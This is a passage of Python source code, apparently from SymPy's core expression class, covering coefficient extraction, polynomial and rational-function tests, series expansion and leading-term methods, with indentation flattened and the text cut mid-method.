Examples
========
>>> from sympy.abc import a, x
>>> (3*x + a*x + 4).as_coefficients_dict()
{1: 4, x: 3, a*x: 1}
>>> _[a]
0
>>> (3*a*x).as_coefficients_dict()
{a*x: 3}
"""
c, m = self.as_coeff_Mul()
if not c.is_Rational:
c = S.One
m = self
d = defaultdict(int)
d.update({m: c})
return d
def as_base_exp(self):
# a -> b ** e
return self, S.One
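# Illustrative note: Pow overrides this so that (x**3).as_base_exp() gives
# (x, 3); the generic fallback treats any other expression as itself raised
# to the first power, i.e. (self, S.One).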
def as_coeff_mul(self, *deps, **kwargs):
"""Return the tuple (c, args) where self is written as a Mul, ``m``.
c should be a Rational multiplied by any terms of the Mul that are
independent of deps.
args should be a tuple of all other terms of m; args is empty
if self is a Number or if self is independent of deps (when given).
This should be used when you don't know if self is a Mul or not but
you want to treat self as a Mul or if you want to process the
individual arguments of the tail of self as a Mul.
- if you know self is a Mul and want only the head, use self.args[0];
- if you don't want to process the arguments of the tail but need the
tail then use self.as_two_terms() which gives the head and tail;
- if you want to split self into an independent and dependent parts
use ``self.as_independent(*deps)``
>>> from sympy import S
>>> from sympy.abc import x, y
>>> (S(3)).as_coeff_mul()
(3, ())
>>> (3*x*y).as_coeff_mul()
(3, (x, y))
>>> (3*x*y).as_coeff_mul(x)
(3*y, (x,))
>>> (3*y).as_coeff_mul(x)
(3*y, ())
"""
if deps:
if not self.has(*deps):
return self, tuple()
return S.One, (self,)
def as_coeff_add(self, *deps):
"""Return the tuple (c, args) where self is written as an Add, ``a``.
c should be a Rational added to any terms of the Add that are
independent of deps.
args should be a tuple of all other terms of ``a``; args is empty
if self is a Number or if self is independent of deps (when given).
This should be used when you don't know if self is an Add or not but
you want to treat self as an Add or if you want to process the
individual arguments of the tail of self as an Add.
- if you know self is an Add and want only the head, use self.args[0];
- if you don't want to process the arguments of the tail but need the
tail then use self.as_two_terms() which gives the head and tail.
- if you want to split self into an independent and dependent parts
use ``self.as_independent(*deps)``
>>> from sympy import S
>>> from sympy.abc import x, y
>>> (S(3)).as_coeff_add()
(3, ())
>>> (3 + x).as_coeff_add()
(3, (x,))
>>> (3 + x + y).as_coeff_add(x)
(y + 3, (x,))
>>> (3 + y).as_coeff_add(x)
(y + 3, ())
"""
if deps:
if not self.has(*deps):
return self, tuple()
return S.Zero, (self,)
def primitive(self):
"""Return the positive Rational that can be extracted non-recursively
from every term of self (i.e., self is treated like an Add). This is
like the as_coeff_Mul() method but primitive always extracts a positive
Rational (never a negative or a Float).
Examples
========
>>> from sympy.abc import x
>>> (3*(x + 1)**2).primitive()
(3, (x + 1)**2)
>>> a = (6*x + 2); a.primitive()
(2, 3*x + 1)
>>> b = (x/2 + 3); b.primitive()
(1/2, x + 6)
>>> (a*b).primitive() == (1, a*b)
True
"""
if not self:
return S.One, S.Zero
c, r = self.as_coeff_Mul(rational=True)
if c.is_negative:
c, r = -c, -r
return c, r
def as_content_primitive(self, radical=False, clear=True):
"""This method should recursively remove a Rational from all arguments
and return that (content) and the new self (primitive). The content
should always be positive and ``Mul(*foo.as_content_primitive()) == foo``.
The primitive need not be in canonical form and should try to preserve
the underlying structure if possible (i.e. expand_mul should not be
applied to self).
Examples
========
>>> from sympy import sqrt
>>> from sympy.abc import x, y, z
>>> eq = 2 + 2*x + 2*y*(3 + 3*y)
The as_content_primitive function is recursive and retains structure:
>>> eq.as_content_primitive()
(2, x + 3*y*(y + 1) + 1)
Integer powers will have Rationals extracted from the base:
>>> ((2 + 6*x)**2).as_content_primitive()
(4, (3*x + 1)**2)
>>> ((2 + 6*x)**(2*y)).as_content_primitive()
(1, (2*(3*x + 1))**(2*y))
Terms may end up joining once their as_content_primitives are added:
>>> ((5*(x*(1 + y)) + 2*x*(3 + 3*y))).as_content_primitive()
(11, x*(y + 1))
>>> ((3*(x*(1 + y)) + 2*x*(3 + 3*y))).as_content_primitive()
(9, x*(y + 1))
>>> ((3*(z*(1 + y)) + 2.0*x*(3 + 3*y))).as_content_primitive()
(1, 6.0*x*(y + 1) + 3*z*(y + 1))
>>> ((5*(x*(1 + y)) + 2*x*(3 + 3*y))**2).as_content_primitive()
(121, x**2*(y + 1)**2)
>>> ((5*(x*(1 + y)) + 2.0*x*(3 + 3*y))**2).as_content_primitive()
(1, 121.0*x**2*(y + 1)**2)
Radical content can also be factored out of the primitive:
>>> (2*sqrt(2) + 4*sqrt(10)).as_content_primitive(radical=True)
(2, sqrt(2)*(1 + 2*sqrt(5)))
If clear=False (default is True) then content will not be removed
from an Add if it can be distributed to leave one or more
terms with integer coefficients.
>>> (x/2 + y).as_content_primitive()
(1/2, x + 2*y)
>>> (x/2 + y).as_content_primitive(clear=False)
(1, x/2 + y)
"""
return S.One, self
def as_numer_denom(self):
""" expression -> a/b -> a, b
This is just a stub that should be defined by
an object's class methods to get anything else.
See Also
========
normal: return a/b instead of a, b
"""
return self, S.One
def normal(self):
n, d = self.as_numer_denom()
if d is S.One:
return n
return n/d
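# Sketch (hypothetical session): normal() simply recombines the pair returned
# by as_numer_denom():
#   >>> from sympy.abc import x
#   >>> (1 + 1/x).as_numer_denom()
#   (x + 1, x)
#   >>> (1 + 1/x).normal()
#   (x + 1)/x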
def extract_multiplicatively(self, c):
"""Return None if it's not possible to make self in the form
c * something in a nice way, i.e. preserving the properties
of arguments of self.
>>> from sympy import symbols, Rational
>>> x, y = symbols('x,y', real=True)
>>> ((x*y)**3).extract_multiplicatively(x**2 * y)
x*y**2
>>> ((x*y)**3).extract_multiplicatively(x**4 * y)
>>> (2*x).extract_multiplicatively(2)
x
>>> (2*x).extract_multiplicatively(3)
>>> (Rational(1, 2)*x).extract_multiplicatively(3)
x/6
"""
c = sympify(c)
if self is S.NaN:
return None
if c is S.One:
return self
elif c == self:
return S.One
if c.is_Add:
cc, pc = c.primitive()
if cc is not S.One:
c = Mul(cc, pc, evaluate=False)
if c.is_Mul:
a, b = c.as_two_terms()
x = self.extract_multiplicatively(a)
if x is not None:
return x.extract_multiplicatively(b)
quotient = self / c
if self.is_Number:
if self is S.Infinity:
if c.is_positive:
return S.Infinity
elif self is S.NegativeInfinity:
if c.is_negative:
return S.Infinity
elif c.is_positive:
return S.NegativeInfinity
elif self is S.ComplexInfinity:
if not c.is_zero:
return S.ComplexInfinity
elif self.is_Integer:
if not quotient.is_Integer:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_Rational:
if not quotient.is_Rational:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_Float:
if not quotient.is_Float:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_NumberSymbol or self.is_Symbol or self is S.ImaginaryUnit:
if quotient.is_Mul and len(quotient.args) == 2:
if quotient.args[0].is_Integer and quotient.args[0].is_positive and quotient.args[1] == self:
return quotient
elif quotient.is_Integer and c.is_Number:
return quotient
elif self.is_Add:
cs, ps = self.primitive()
if cs is not S.One:
return Mul(cs, ps, evaluate=False).extract_multiplicatively(c)
newargs = []
for arg in self.args:
newarg = arg.extract_multiplicatively(c)
if newarg is not None:
newargs.append(newarg)
else:
return None
return Add(*newargs)
elif self.is_Mul:
args = list(self.args)
for i, arg in enumerate(args):
newarg = arg.extract_multiplicatively(c)
if newarg is not None:
args[i] = newarg
return Mul(*args)
elif self.is_Pow:
if c.is_Pow and c.base == self.base:
new_exp = self.exp.extract_additively(c.exp)
if new_exp is not None:
return self.base ** (new_exp)
elif c == self.base:
new_exp = self.exp.extract_additively(1)
if new_exp is not None:
return self.base ** (new_exp)
def extract_additively(self, c):
"""Return self - c if it's possible to subtract c from self and
make all matching coefficients move towards zero, else return None.
Examples
========
>>> from sympy.abc import x, y
>>> e = 2*x + 3
>>> e.extract_additively(x + 1)
x + 2
>>> e.extract_additively(3*x)
>>> e.extract_additively(4)
>>> (y*(x + 1)).extract_additively(x + 1)
>>> ((x + 1)*(x + 2*y + 1) + 3).extract_additively(x + 1)
(x + 1)*(x + 2*y) + 3
Sometimes auto-expansion will return a less simplified result
than desired; gcd_terms might be used in such cases:
>>> from sympy import gcd_terms
>>> (4*x*(y + 1) + y).extract_additively(x)
4*x*(y + 1) + x*(4*y + 3) - x*(4*y + 4) + y
>>> gcd_terms(_)
x*(4*y + 3) + y
See Also
========
extract_multiplicatively
coeff
as_coefficient
"""
c = sympify(c)
if self is S.NaN:
return None
if c is S.Zero:
return self
elif c == self:
return S.Zero
elif self is S.Zero:
return None
if self.is_Number:
if not c.is_Number:
return None
co = self
diff = co - c
# XXX should we match types? i.e. should 3 - .1 succeed?
if (co > 0 and diff > 0 and diff < co or
co < 0 and diff < 0 and diff > co):
return diff
return None
if c.is_Number:
co, t = self.as_coeff_Add()
xa = co.extract_additively(c)
if xa is None:
return None
return xa + t
# handle the args[0].is_Number case separately
# since we will have trouble looking for the coeff of
# a number.
if c.is_Add and c.args[0].is_Number:
# whole term as a term factor
co = self.coeff(c)
xa0 = (co.extract_additively(1) or 0)*c
if xa0:
diff = self - co*c
return (xa0 + (diff.extract_additively(c) or diff)) or None
# term-wise
h, t = c.as_coeff_Add()
sh, st = self.as_coeff_Add()
xa = sh.extract_additively(h)
if xa is None:
return None
xa2 = st.extract_additively(t)
if xa2 is None:
return None
return xa + xa2
# whole term as a term factor
co = self.coeff(c)
xa0 = (co.extract_additively(1) or 0)*c
if xa0:
diff = self - co*c
return (xa0 + (diff.extract_additively(c) or diff)) or None
# term-wise
coeffs = []
for a in Add.make_args(c):
ac, at = a.as_coeff_Mul()
co = self.coeff(at)
if not co:
return None
coc, cot = co.as_coeff_Add()
xa = coc.extract_additively(ac)
if xa is None:
return None
self -= co*at
coeffs.append((cot + xa)*at)
coeffs.append(self)
return Add(*coeffs)
def could_extract_minus_sign(self):
"""Canonical way to choose an element in the set {e, -e} where
e is any expression. If the canonical element is e, we have
e.could_extract_minus_sign() == True, else
e.could_extract_minus_sign() == False.
For any expression, the set ``{e.could_extract_minus_sign(),
(-e).could_extract_minus_sign()}`` must be ``{True, False}``.
>>> from sympy.abc import x, y
>>> (x-y).could_extract_minus_sign() != (y-x).could_extract_minus_sign()
True
"""
negative_self = -self
self_has_minus = (self.extract_multiplicatively(-1) is not None)
negative_self_has_minus = (
(negative_self).extract_multiplicatively(-1) is not None)
if self_has_minus != negative_self_has_minus:
return self_has_minus
else:
if self.is_Add:
# We choose the one with less arguments with minus signs
all_args = len(self.args)
negative_args = len([False for arg in self.args if arg.could_extract_minus_sign()])
positive_args = all_args - negative_args
if positive_args > negative_args:
return False
elif positive_args < negative_args:
return True
elif self.is_Mul:
# We choose the one with an odd number of minus signs
num, den = self.as_numer_denom()
args = Mul.make_args(num) + Mul.make_args(den)
arg_signs = [arg.could_extract_minus_sign() for arg in args]
negative_args = list(filter(None, arg_signs))
return len(negative_args) % 2 == 1
# As a last resort, we choose the one with greater value of .sort_key()
return bool(self.sort_key() < negative_self.sort_key())
def extract_branch_factor(self, allow_half=False):
"""
Try to write self as ``exp_polar(2*pi*I*n)*z`` in a nice way.
Return (z, n).
>>> from sympy import exp_polar, I, pi
>>> from sympy.abc import x, y
>>> exp_polar(I*pi).extract_branch_factor()
(exp_polar(I*pi), 0)
>>> exp_polar(2*I*pi).extract_branch_factor()
(1, 1)
>>> exp_polar(-pi*I).extract_branch_factor()
(exp_polar(I*pi), -1)
>>> exp_polar(3*pi*I + x).extract_branch_factor()
(exp_polar(x + I*pi), 1)
>>> (y*exp_polar(-5*pi*I)*exp_polar(3*pi*I + 2*pi*x)).extract_branch_factor()
(y*exp_polar(2*pi*x), -1)
>>> exp_polar(-I*pi/2).extract_branch_factor()
(exp_polar(-I*pi/2), 0)
If allow_half is True, also extract exp_polar(I*pi):
>>> exp_polar(I*pi).extract_branch_factor(allow_half=True)
(1, 1/2)
>>> exp_polar(2*I*pi).extract_branch_factor(allow_half=True)
(1, 1)
>>> exp_polar(3*I*pi).extract_branch_factor(allow_half=True)
(1, 3/2)
>>> exp_polar(-I*pi).extract_branch_factor(allow_half=True)
(1, -1/2)
"""
from sympy import exp_polar, pi, I, ceiling, Add
n = S(0)
res = S(1)
args = Mul.make_args(self)
exps = []
for arg in args:
if arg.func is exp_polar:
exps += [arg.exp]
else:
res *= arg
piimult = S(0)
extras = []
while exps:
exp = exps.pop()
if exp.is_Add:
exps += exp.args
continue
if exp.is_Mul:
coeff = exp.as_coefficient(pi*I)
if coeff is not None:
piimult += coeff
continue
extras += [exp]
if not piimult.free_symbols:
coeff = piimult
tail = ()
else:
coeff, tail = piimult.as_coeff_add(*piimult.free_symbols)
# round down to nearest multiple of 2
branchfact = ceiling(coeff/2 - S(1)/2)*2
n += branchfact/2
c = coeff - branchfact
if allow_half:
nc = c.extract_additively(1)
if nc is not None:
n += S(1)/2
c = nc
newexp = pi*I*Add(*((c, ) + tail)) + Add(*extras)
if newexp != 0:
res *= exp_polar(newexp)
return res, n
def _eval_is_polynomial(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_polynomial(self, *syms):
"""
Return True if self is a polynomial in syms and False otherwise.
This checks if self is an exact polynomial in syms. This function
returns False for expressions that are "polynomials" with symbolic
exponents. Thus, you should be able to apply polynomial algorithms to
expressions for which this returns True, and Poly(expr, \*syms) should
work if and only if expr.is_polynomial(\*syms) returns True. The
polynomial does not have to be in expanded form. If no symbols are
given, all free symbols in the expression will be used.
This is not part of the assumptions system. You cannot do
Symbol('z', polynomial=True).
Examples
========
>>> from sympy import Symbol
>>> x = Symbol('x')
>>> ((x**2 + 1)**4).is_polynomial(x)
True
>>> ((x**2 + 1)**4).is_polynomial()
True
>>> (2**x + 1).is_polynomial(x)
False
>>> n = Symbol('n', nonnegative=True, integer=True)
>>> (x**n + 1).is_polynomial(x)
False
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be a polynomial to
become one.
>>> from sympy import sqrt, factor, cancel
>>> y = Symbol('y', positive=True)
>>> a = sqrt(y**2 + 2*y + 1)
>>> a.is_polynomial(y)
False
>>> factor(a)
y + 1
>>> factor(a).is_polynomial(y)
True
>>> b = (y**2 + 2*y + 1)/(y + 1)
>>> b.is_polynomial(y)
False
>>> cancel(b)
y + 1
>>> cancel(b).is_polynomial(y)
True
See also .is_rational_function()
"""
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant polynomial
return True
else:
return self._eval_is_polynomial(syms)
def _eval_is_rational_function(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_rational_function(self, *syms):
"""
Test whether function is a ratio of two polynomials in the given
symbols, syms. When syms is not given, all free symbols will be used.
The rational function does not have to be in expanded or in any kind of
canonical form.
This function returns False for expressions that are "rational
functions" with symbolic exponents. Thus, you should be able to call
.as_numer_denom() and apply polynomial algorithms to the result for
expressions for which this returns True.
This is not part of the assumptions system. You cannot do
Symbol('z', rational_function=True).
Examples
========
>>> from sympy import Symbol, sin
>>> from sympy.abc import x, y
>>> (x/y).is_rational_function()
True
>>> (x**2).is_rational_function()
True
>>> (x/sin(y)).is_rational_function(y)
False
>>> n = Symbol('n', integer=True)
>>> (x**n + 1).is_rational_function(x)
False
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be a rational function
to become one.
>>> from sympy import sqrt, factor
>>> y = Symbol('y', positive=True)
>>> a = sqrt(y**2 + 2*y + 1)/y
>>> a.is_rational_function(y)
False
>>> factor(a)
(y + 1)/y
>>> factor(a).is_rational_function(y)
True
See also is_algebraic_expr().
"""
if self in [S.NaN, S.Infinity, -S.Infinity, S.ComplexInfinity]:
return False
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant rational function
return True
else:
return self._eval_is_rational_function(syms)
def _eval_is_algebraic_expr(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_algebraic_expr(self, *syms):
"""
This tests whether a given expression is algebraic or not, in the
given symbols, syms. When syms is not given, all free symbols
will be used. The expression does not have to be in expanded
or in any kind of canonical form.
This function returns False for expressions that are "algebraic
expressions" with symbolic exponents. This is a simple extension of
is_rational_function(), including rational exponentiation.
Examples
========
>>> from sympy import Symbol, sqrt
>>> x = Symbol('x', real=True)
>>> sqrt(1 + x).is_rational_function()
False
>>> sqrt(1 + x).is_algebraic_expr()
True
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be an algebraic
expression to become one.
>>> from sympy import exp, factor
>>> a = sqrt(exp(x)**2 + 2*exp(x) + 1)/(exp(x) + 1)
>>> a.is_algebraic_expr(x)
False
>>> factor(a).is_algebraic_expr()
True
See Also
========
is_rational_function()
References
==========
- http://en.wikipedia.org/wiki/Algebraic_expression
"""
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant algebraic expression
return True
else:
return self._eval_is_algebraic_expr(syms)
###################################################################################
##################### SERIES, LEADING TERM, LIMIT, ORDER METHODS ##################
###################################################################################
def series(self, x=None, x0=0, n=6, dir="+", logx=None):
"""
Series expansion of "self" around ``x = x0`` yielding either terms of
the series one by one (the lazy series given when n=None), else
all the terms at once when n != None.
Returns the series expansion of "self" around the point ``x = x0``
with respect to ``x`` up to ``O((x - x0)**n, x, x0)`` (default n is 6).
If ``x=None`` and ``self`` is univariate, the univariate symbol will
be supplied, otherwise an error will be raised.
>>> from sympy import cos, exp
>>> from sympy.abc import x, y
>>> cos(x).series()
1 - x**2/2 + x**4/24 + O(x**6)
>>> cos(x).series(n=4)
1 - x**2/2 + O(x**4)
>>> cos(x).series(x, x0=1, n=2)
cos(1) - (x - 1)*sin(1) + O((x - 1)**2, (x, 1))
>>> e = cos(x + exp(y))
>>> e.series(y, n=2)
cos(x + 1) - y*sin(x + 1) + O(y**2)
>>> e.series(x, n=2)
cos(exp(y)) - x*sin(exp(y)) + O(x**2)
If ``n=None`` then a generator of the series terms will be returned.
>>> term=cos(x).series(n=None)
>>> [next(term) for i in range(2)]
[1, -x**2/2]
For ``dir=+`` (default) the series is calculated from the right and
for ``dir=-`` the series from the left. For smooth functions this
flag will not alter the results.
>>> abs(x).series(dir="+")
x
>>> abs(x).series(dir="-")
-x
"""
from sympy import collect, Dummy, Order, Rational, Symbol
if x is None:
syms = self.atoms(Symbol)
if not syms:
return self
elif len(syms) > 1:
raise ValueError('x must be given for multivariate functions.')
x = syms.pop()
if not self.has(x):
if n is None:
return (s for s in [self])
else:
return self
if len(dir) != 1 or dir not in '+-':
raise ValueError("Dir must be '+' or '-'")
if x0 in [S.Infinity, S.NegativeInfinity]:
dir = {S.Infinity: '+', S.NegativeInfinity: '-'}[x0]
s = self.subs(x, 1/x).series(x, n=n, dir=dir)
if n is None:
return (si.subs(x, 1/x) for si in s)
return s.subs(x, 1/x)
# use rep to shift origin to x0 and change sign (if dir is negative)
# and undo the process with rep2
if x0 or dir == '-':
if dir == '-':
rep = -x + x0
rep2 = -x
rep2b = x0
else:
rep = x + x0
rep2 = x
rep2b = -x0
s = self.subs(x, rep).series(x, x0=0, n=n, dir='+', logx=logx)
if n is None: # lseries...
return (si.subs(x, rep2 + rep2b) for si in s)
return s.subs(x, rep2 + rep2b)
# from here on it's x0=0 and dir='+' handling
if x.is_positive is x.is_negative is None or x.is_Symbol is not True:
# replace x with an x that has a positive assumption
xpos = Dummy('x', positive=True, finite=True)
rv = self.subs(x, xpos).series(xpos, x0, n, dir, logx=logx)
if n is None:
return (s.subs(xpos, x) for s in rv)
else:
return rv.subs(xpos, x)
if n is not None: # nseries handling
s1 = self._eval_nseries(x, n=n, logx=logx)
o = s1.getO() or S.Zero
if o:
# make sure the requested order is returned
ngot = o.getn()
if ngot > n:
# leave o in its current form (e.g. with x*log(x)) so
# it eats terms properly, then replace it below
if n != 0:
s1 += o.subs(x, x**Rational(n, ngot))
else:
s1 += Order(1, x)
elif ngot < n:
# increase the requested number of terms to get the desired
# number; keep increasing (up to 9) until the received order
# differs from the original order, then predict how many
# additional terms are needed
for more in range(1, 9):
s1 = self._eval_nseries(x, n=n + more, logx=logx)
newn = s1.getn()
if newn != ngot:
ndo = n + (n - ngot)*more/(newn - ngot)
s1 = self._eval_nseries(x, n=ndo, logx=logx)
while s1.getn() < n:
s1 = self._eval_nseries(x, n=ndo, logx=logx)
ndo += 1
break
else:
raise ValueError('Could not calculate %s terms for %s'
% (str(n), self))
s1 += Order(x**n, x)
o = s1.getO()
s1 = s1.removeO()
else:
o = Order(x**n, x)
if (s1 + o).removeO() == s1:
o = S.Zero
try:
return collect(s1, x) + o
except NotImplementedError:
return s1 + o
else: # lseries handling
def yield_lseries(s):
"""Return terms of lseries one at a time."""
for si in s:
if not si.is_Add:
yield si
continue
# yield terms 1 at a time if possible
# by increasing order until all the
# terms have been returned
yielded = 0
o = Order(si, x)*x
ndid = 0
ndo = len(si.args)
while True:
do = (si - yielded + o).removeO()
o *= x
if not do or do.is_Order:
continue
if do.is_Add:
ndid += len(do.args)
else:
ndid += 1
yield do
if ndid == ndo:
break
yielded += do
return yield_lseries(self.removeO()._eval_lseries(x, logx=logx))
def taylor_term(self, n, x, *previous_terms):
"""General method for the taylor term.
This method is slow, because it differentiates n times. Subclasses can
redefine it to make it faster by using the "previous_terms".
"""
from sympy import Dummy, factorial
x = sympify(x)
_x = Dummy('x')
return self.subs(x, _x).diff(_x, n).subs(_x, x).subs(x, 0) * x**n / factorial(n)
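# Sketch: the generic term is f.diff(x, n).subs(x, 0) * x**n / factorial(n);
# for example the n=3 term of sin(x) is -x**3/6:
#   >>> from sympy import sin
#   >>> from sympy.abc import x
#   >>> sin(x).taylor_term(3, x)
#   -x**3/6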
def lseries(self, x=None, x0=0, dir='+', logx=None):
"""
Wrapper for series yielding an iterator of the terms of the series.
Note: an infinite series will yield an infinite iterator. The following,
for example, will never terminate. It will just keep printing terms
of the sin(x) series::
for term in sin(x).lseries(x):
print(term)
The advantage of lseries() over nseries() is that many times you are
just interested in the next term in the series (i.e. the first term for
example), but you don't know how many you should ask for in nseries()
using the "n" parameter.
See also nseries().
"""
return self.series(x, x0, n=None, dir=dir, logx=logx)
def _eval_lseries(self, x, logx=None):
# default implementation of lseries is using nseries(), and adaptively
# increasing the "n". As you can see, it is not very efficient, because
# we are calculating the series over and over again. Subclasses should
# override this method and implement much more efficient yielding of
# terms.
n = 0
series = self._eval_nseries(x, n=n, logx=logx)
if not series.is_Order:
if series.is_Add:
yield series.removeO()
else:
yield series
return
while series.is_Order:
n += 1
series = self._eval_nseries(x, n=n, logx=logx)
e = series.removeO()
yield e
while True:
while True:
n += 1
series = self._eval_nseries(x, n=n, logx=logx).removeO()
if e != series:
break
yield series - e
e = series
def nseries(self, x=None, x0=0, n=6, dir='+', logx=None):
"""
Wrapper to _eval_nseries if assumptions allow, else to series.
If x is given, x0 is 0, dir='+', and self has x, then _eval_nseries is
called. This calculates "n" terms in the innermost expressions and
then builds up the final series just by "cross-multiplying" everything
out.
The optional ``logx`` parameter can be used to replace any log(x) in the
returned series with a symbolic value to avoid evaluating log(x) at 0. A
symbol to use in place of log(x) should be provided.
Advantage -- it's fast, because we don't have to determine how many
terms we need to calculate in advance.
Disadvantage -- you may end up with fewer terms than you expected,
but the O(x**n) term appended will always be correct, and so the
result, though perhaps shorter, will also be correct.
If any of those assumptions is not met, this is treated like a
wrapper to series which will try harder to return the correct
number of terms.
See also lseries().
Examples
========
>>> from sympy import sin, log, Symbol
>>> from sympy.abc import x, y
>>> sin(x).nseries(x, 0, 6)
x - x**3/6 + x**5/120 + O(x**6)
>>> log(x+1).nseries(x, 0, 5)
x - x**2/2 + x**3/3 - x**4/4 + O(x**5)
Handling of the ``logx`` parameter --- in the following example the
expansion fails since ``sin`` does not have an asymptotic expansion
at -oo (the limit of log(x) as x approaches 0):
>>> e = sin(log(x))
>>> e.nseries(x, 0, 6)
Traceback (most recent call last):
...
PoleError: ...
...
>>> logx = Symbol('logx')
>>> e.nseries(x, 0, 6, logx=logx)
sin(logx)
In the following example, the expansion works but gives only an Order term
unless the ``logx`` parameter is used:
>>> e = x**y
>>> e.nseries(x, 0, 2)
O(log(x)**2)
>>> e.nseries(x, 0, 2, logx=logx)
exp(logx*y)
"""
if x and x not in self.free_symbols:
return self
if x is None or x0 or dir != '+': # {see XPOS above} or (x.is_positive == x.is_negative == None):
return self.series(x, x0, n, dir)
else:
return self._eval_nseries(x, n=n, logx=logx)
def _eval_nseries(self, x, n, logx):
"""
Return terms of series for self up to O(x**n) at x=0
from the positive direction.
This is a method that should be overridden in subclasses. Users should
never call this method directly (use .nseries() instead), so you don't
have to write docstrings for _eval_nseries().
"""
from sympy.utilities.misc import filldedent
raise NotImplementedError(filldedent("""
The _eval_nseries method should be added to
%s to give terms up to O(x**n) at x=0
from the positive direction so it is available when
nseries calls it.""" % self.func)
)
def limit(self, x, xlim, dir='+'):
""" Compute limit x->xlim.
"""
from sympy.series.limits import limit
return limit(self, x, xlim, dir)
def compute_leading_term(self, x, logx=None):
"""
as_leading_term is only allowed for results of .series().
This is a wrapper that computes a series first.
"""
from sympy import Dummy, log
from sympy.series.gruntz import calculate_series
if self.removeO() == 0:
return self
if logx is None:
d = Dummy('logx')
s = calculate_series(self, x, d).subs(d, log(x))
else:
s = calculate_series(self, x, logx)
return s.as_leading_term(x)
@cacheit
def as_leading_term(self, *symbols):
"""
Returns the leading (nonzero) term of the series expansion of self.
The _eval_as_leading_term routines are used to do this, and they must
always return a non-zero value.
Examples
========
>>> from sympy.abc import x
>>> (1 + x + x**2).as_leading_term(x)
1
>>> (1/x**2 + x + x**2).as_leading_term(x)
x**(-2)
"""
from sympy import powsimp
if len(symbols) > 1:
c = self
for x in symbols:
c = c.as_leading_term(x)
return c
elif not symbols:
return self
x = sympify(symbols[0])
if not x.is_Symbol:
raise ValueError('expecting a Symbol but got %s' % x)
if x not in self.free_symbols:
return self
obj = self._eval_as_leading_term(x)
if obj is not None:
return powsimp(obj, deep=True, combine='exp')
raise NotImplementedError('as_leading_term(%s, %s)' % (self, x))
def _eval_as_leading_term(self, x):
return self
def as_coeff_exponent(self, x):
""" ``c*x**e -> c,e`` where x can be any symbolic expression.
"""
from sympy import collect
s = collect(self, x)
c, p = s.as_coeff_mul(x)
if len(p) == 1:
b, e = p[0].as_base_exp()
if b == x:
return c, e
return s, S.Zero
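# Sketch (hypothetical session): collect in x, then split off a single power
# of x if one remains, else fall back to (self, 0):
#   >>> from sympy.abc import x
#   >>> (3*x**2).as_coeff_exponent(x)
#   (3, 2)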
def leadterm(self, x):
"""
Returns the leading term a*x**b as a tuple (a, b).
Examples
========
>>> from sympy.abc import x
>>> (1+x+x**2).leadterm(x)
(1, 0)
>>> (1/x**2+x+x**2).leadterm(x)
(1, -2)
"""
from sympy import Dummy, log
l = self.as_leading_term(x)
d = Dummy('logx')
if l.has(log(x)):
l = l.subs(log(x), d)
c, e = l.as_coeff_exponent(x)
if x in c.free_symbols:
from sympy.utilities.misc import filldedent
raise ValueError(filldedent("""
cannot compute leadterm(%s, %s). The coefficient
should have been free of x but got %s""" % (self, x, c)))
c = c.subs(d, log(x))
return c, e
def as_coeff_Mul(self, rational=False):
"""Efficiently extract the coefficient of a product. """
return S.One, self
def as_coeff_Add(self):
"""Efficiently extract the coefficient of a summation. """
return S.Zero, self
def fps(self, x=None, x0=0, dir=1, hyper=True, order=4, rational=True,
full=False):
"""
Compute the formal power series of self.
See the docstring of the :func:`fps` function in sympy.series.formal for
more information.
"""
from sympy.series.formal import fps
return fps(self, x, x0, dir, hyper, order, rational, full)
def fourier_series(self, limits=None):
"""Compute fourier sine/cosine series of self.
See the docstring of the :func:`fourier_series` in sympy.series.fourier
for more information.
"""
from sympy.series.fourier import fourier_series
return fourier_series(self, limits)
###################################################################################
##################### DERIVATIVE, INTEGRAL, FUNCTIONAL METHODS ####################
###################################################################################
def diff(self, *symbols, **assumptions):
new_symbols = list(map(sympify, symbols)) # e.g. x, 2, y, z
assumptions.setdefault("evaluate", True)
return Derivative(self, *new_symbols, **assumptions)
###########################################################################
###################### EXPRESSION EXPANSION METHODS #######################
###########################################################################
# Relevant subclasses should override _eval_expand_hint() methods. See
# the docstring of expand() for more info.
def _eval_expand_complex(self, **hints):
real, imag = self.as_real_imag(**hints)
return real + S.ImaginaryUnit*imag
@staticmethod
def _expand_hint(expr, hint, deep=True, **hints):
"""
Helper for ``expand()``. Recursively calls ``expr._eval_expand_hint()``.
Returns ``(expr, hit)``, where expr is the (possibly) expanded
``expr`` and ``hit`` is ``True`` if ``expr`` was truly expanded and
``False`` otherwise.
"""
hit = False
# XXX: Hack to support non-Basic args
# |
# V
if deep and getattr(expr, 'args', ()) and not expr.is_Atom:
sargs = []
for arg in expr.args:
arg, arghit = Expr._expand_hint(arg, hint, **hints)
hit |= arghit
sargs.append(arg)
if hit:
expr = expr.func(*sargs)
if hasattr(expr, hint):
newexpr = getattr(expr, hint)(**hints)
if newexpr != expr:
return (newexpr, True)
return (expr, hit)
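# Sketch (hypothetical session): with the '_eval_expand_mul' hint the helper
# distributes a product over a sum and reports that an expansion happened:
#   >>> from sympy.abc import x, y, z
#   >>> Expr._expand_hint(x*(y + z), '_eval_expand_mul')
#   (x*y + x*z, True)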
@cacheit
def expand(self, deep=True, modulus=None, power_base=True, power_exp=True,
mul=True, log=True, multinomial=True, basic=True, **hints):
"""
Expand an expression using hints.
See the docstring of the expand() function in sympy.core.function for
more information.
"""
from sympy.simplify.radsimp import fraction
hints.update(power_base=power_base, power_exp=power_exp, mul=mul,
log=log, multinomial=multinomial, basic=basic)
expr = self
if hints.pop('frac', False):
n, d = [a.expand(deep=deep, modulus=modulus, **hints)
for a in fraction(self)]
return n/d
elif hints.pop('denom', False):
n, d = fraction(self)
